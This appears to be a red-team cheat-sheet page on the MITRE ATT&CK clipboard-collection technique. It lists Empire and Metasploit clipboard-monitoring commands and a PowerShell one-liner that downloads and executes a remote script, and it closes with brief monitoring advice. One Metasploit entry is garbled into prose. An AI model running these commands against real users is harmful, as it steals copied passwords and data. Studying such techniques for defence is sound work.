Clipboard Data
https://attack.mitre.org/techniques/T1115/
ATT&CK ID: T1115
Permissions Required: User
Description
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
In Windows, Applications can access clipboard data by using the Windows API.
[Source]
Techniques
Empire
This module monitors the clipboard on a specified interval for changes to copied text.
usemodule powershell/collection/clipboard_monitor

Get-ClipboardContents
Get-ClipboardContents
monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the scripts execution time.
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

Metasploit
This Metasploit module can be loaded from the meterpreter shell.
load extapi
# Read the target's current clipboard (text, files, images)
clipboard_get_data
# Dump all captured clipboard content
clipboard_monitor_dump
# Pause the active clipboard monitor
clipboard_monitor_pause
# Delete all captured clipboard content without dumping it
clipboard_monitor_purge
# Resume the paused clipboard monitor
clipboard_monitor_resume
# Start the clipboard monitor
Start the clipboard monitor
# Stop the clipboard monitor
clipboard_monitor_stop
# Write text to the target's clipboard
clipboard_set_text
PowerShell
The native PowerShell command Get-Clipboard
retrieves information that is currently stored in the clipboard.
Get-Clipboard

Mitigations
Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.
Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.
Last updated